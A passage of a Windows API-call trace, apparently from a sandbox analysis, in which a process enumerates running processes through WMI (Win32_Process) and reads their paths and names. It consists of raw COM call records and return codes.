wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.477] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x66 [0213.477] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x66 [0213.477] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.477] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.477] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.477] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.478] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612408) returned 0x0 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612408, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.479] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612408, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f6a0) returned 0x0 [0213.479] WbemDefPath:IUnknown:Release (This=0x5612408) returned 0x0 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f6a0) returned 0x0 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.479] WbemDefPath:IUnknown:AddRef (This=0x560f6a0) returned 0x3 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612418) returned 0x0 [0213.479] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612418, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.479] WbemDefPath:IUnknown:Release (This=0x5612418) returned 0x3 [0213.479] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.479] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.480] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.480] WbemDefPath:IUnknown:Release (This=0x560f6a0) returned 0x2 [0213.480] WbemDefPath:IUnknown:Release (This=0x560f6a0) returned 0x1 [0213.480] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.480] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.480] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f6a0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f6a0) returned 0x0 [0213.480] WbemDefPath:IUnknown:AddRef (This=0x560f6a0) returned 0x3 [0213.480] WbemDefPath:IUnknown:Release (This=0x560f6a0) returned 0x2 [0213.480] WbemDefPath:IWbemPath:SetText (This=0x560f6a0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2396\"") returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.480] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.480] IWbemClassObject:Get (in: This=0x560ccb0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2683d38*=0, plFlavor=0x2683d3c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="which.exe", varVal2=0x0), pType=0x2683d38*=8, plFlavor=0x2683d3c*=0) returned 0x0 [0213.480] SysStringByteLen (bstr="which.exe") returned 0x12 [0213.480] SysStringByteLen (bstr="which.exe") returned 0x12 [0213.480] IWbemClassObject:Get (in: This=0x560ccb0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2683d38*=8, plFlavor=0x2683d3c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="which.exe", varVal2=0x0), pType=0x2683d38*=8, plFlavor=0x2683d3c*=0) returned 0x0 [0213.481] SysStringByteLen (bstr="which.exe") returned 0x12 [0213.481] SysStringByteLen (bstr="which.exe") returned 0x12 [0213.481] CoTaskMemAlloc (cb=0x4) returned 0x5612448 [0213.481] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612448, puReturned=0x267acc0 | out: apObjects=0x5612448*=0x560ce48, puReturned=0x267acc0*=0x1) returned 0x0 [0213.608] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560ce48) returned 0x0 [0213.608] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.608] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.609] IUnknown:AddRef (This=0x560ce48) returned 0x3 [0213.609] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.609] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.609] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560ce4c) returned 0x0 [0213.609] IMarshal:GetUnmarshalClass (in: This=0x560ce4c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.609] IUnknown:Release (This=0x560ce4c) returned 0x3 [0213.609] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.610] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.610] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.610] IUnknown:Release (This=0x560ce48) returned 0x2 [0213.610] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.610] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.610] IUnknown:QueryInterface (in: This=0x560ce48, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560ce48) returned 0x0 [0213.610] IUnknown:AddRef (This=0x560ce48) returned 0x4 [0213.610] IUnknown:Release (This=0x560ce48) returned 0x3 [0213.610] IUnknown:Release (This=0x560ce48) returned 0x2 [0213.610] CoTaskMemFree (pv=0x5612448) [0213.611] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.611] IUnknown:AddRef (This=0x560ce48) returned 0x3 [0213.611] IWbemClassObject:Get (in: This=0x560ce48, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.612] IWbemClassObject:Get (in: This=0x560ce48, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.612] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0213.612] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x66 [0213.612] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.612] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.612] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.612] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.614] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612448) returned 0x0 [0213.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612448, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.614] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612448, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f780) returned 0x0 [0213.614] WbemDefPath:IUnknown:Release (This=0x5612448) returned 0x0 [0213.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f780) returned 0x0 [0213.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.615] WbemDefPath:IUnknown:AddRef (This=0x560f780) returned 0x3 [0213.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612458) returned 0x0 [0213.615] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612458, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.615] WbemDefPath:IUnknown:Release (This=0x5612458) returned 0x3 [0213.615] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.615] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.615] WbemDefPath:IUnknown:Release (This=0x560f780) returned 0x2 [0213.615] WbemDefPath:IUnknown:Release (This=0x560f780) returned 0x1 [0213.615] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.615] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.615] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f780, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f780) returned 0x0 [0213.615] WbemDefPath:IUnknown:AddRef (This=0x560f780) returned 0x3 [0213.615] WbemDefPath:IUnknown:Release (This=0x560f780) returned 0x2 [0213.615] WbemDefPath:IWbemPath:SetText (This=0x560f780, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2408\"") returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.616] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.616] IWbemClassObject:Get (in: This=0x560ce48, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268459c*=0, plFlavor=0x26845a0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="could team.exe", varVal2=0x0), pType=0x268459c*=8, plFlavor=0x26845a0*=0) returned 0x0 [0213.616] SysStringByteLen (bstr="could team.exe") returned 0x1c [0213.616] SysStringByteLen (bstr="could team.exe") returned 0x1c [0213.616] IWbemClassObject:Get (in: This=0x560ce48, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268459c*=8, plFlavor=0x26845a0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="could team.exe", varVal2=0x0), pType=0x268459c*=8, plFlavor=0x26845a0*=0) returned 0x0 [0213.616] SysStringByteLen (bstr="could team.exe") returned 0x1c [0213.616] SysStringByteLen (bstr="could team.exe") returned 0x1c [0213.616] CoTaskMemAlloc (cb=0x4) returned 0x5612488 [0213.616] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612488, puReturned=0x267acc0 | out: apObjects=0x5612488*=0x560cfe0, puReturned=0x267acc0*=0x1) returned 0x0 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560cfe0) returned 0x0 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.618] IUnknown:AddRef (This=0x560cfe0) returned 0x3 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.618] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560cfe4) returned 0x0 [0213.618] IMarshal:GetUnmarshalClass (in: This=0x560cfe4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.618] IUnknown:Release (This=0x560cfe4) returned 0x3 [0213.618] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.619] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.619] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.619] IUnknown:Release (This=0x560cfe0) returned 0x2 [0213.619] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.619] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.619] IUnknown:QueryInterface (in: This=0x560cfe0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560cfe0) returned 0x0 [0213.619] IUnknown:AddRef (This=0x560cfe0) returned 0x4 [0213.619] IUnknown:Release (This=0x560cfe0) returned 0x3 [0213.619] IUnknown:Release (This=0x560cfe0) returned 0x2 [0213.619] CoTaskMemFree (pv=0x5612488) [0213.619] CoGetContextToken (in: pToken=0x38ecc4 | out: 